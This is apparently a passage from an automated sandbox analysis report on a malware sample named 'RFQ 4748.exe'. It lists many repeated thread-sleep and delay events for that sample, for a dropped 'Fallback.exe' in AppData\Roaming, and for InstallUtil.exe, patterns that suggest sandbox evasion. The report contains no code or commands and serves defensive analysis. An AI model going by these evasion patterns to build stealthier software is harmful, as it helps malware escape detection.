                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -595670s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -595562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -595453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -595343s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -595234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -595125s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -595015s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -594906s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -594797s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -594679s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -594578s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 5588Thread sleep count: 2563 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 5588Thread sleep count: 5950 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -99891s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -99780s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -99672s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -99563s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -99433s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -99328s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -99132s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -98884s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -98688s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -98563s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -98438s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -98313s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -98203s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -98093s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -97985s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -97875s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -97766s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -97641s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -97531s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -97422s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -97313s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -97194s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -97078s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -96969s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -96860s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -96735s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -96610s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -96453s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -96335s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -96208s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -96078s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -95969s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -95860s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -95735s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -95610s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -95485s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -95360s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -95235s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -95110s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -94985s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 1848Thread sleep time: -94860s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep count: 39 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1352Thread sleep count: 2676 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1352Thread sleep count: 7146 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -599766s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -599656s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -599546s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -599438s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -599313s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -599188s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -599063s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -598953s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -598844s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -598719s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -598607s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -598500s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -598391s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -598281s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -598172s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -598062s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -597949s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -597715s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -597599s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -597469s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -597360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -597235s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -597110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -596985s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -596860s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -596735s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -596610s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -596485s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -596360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -596235s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -596110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -595985s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -595860s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -595735s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -595610s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -595485s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -595360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -595208s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -595049s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -594922s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -594811s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -594703s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -594594s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -594485s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -594360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -594235s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -594110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -593985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 99874Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 99766Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 99656Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 99547Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 99437Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 99328Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 99219Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 99098Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 98969Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 98859Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 98627Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 98500Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 98382Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 98264Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 98156Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 98029Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 97922Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 97813Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 97688Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 97563Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 97438Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 97328Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 97219Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 97094Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 96984Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 96875Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 96766Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 96656Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 96547Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 96437Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 96328Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 96219Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 96094Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 95984Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 95875Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 95766Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 95656Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 95547Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 95437Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 95306Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 95187Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 95078Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 94969Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 94844Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 94734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598451Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597135Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597017Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596866Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595670Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594679Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594578Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 99891Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 99780Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 99672Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 99563Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 99433Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 99328Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 99132Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 98884Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 98688Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 98563Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 98438Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 98313Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 98203Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 98093Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 97985Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 97875Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 97766Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 97641Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 97531Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 97422Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 97313Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 97194Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 97078Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 96969Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 96860Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 96735Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 96610Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 96453Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 96335Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 96208Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 96078Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 95969Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 95860Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 95735Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 95610Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 95485Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 95360Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 95235Jump to behavior
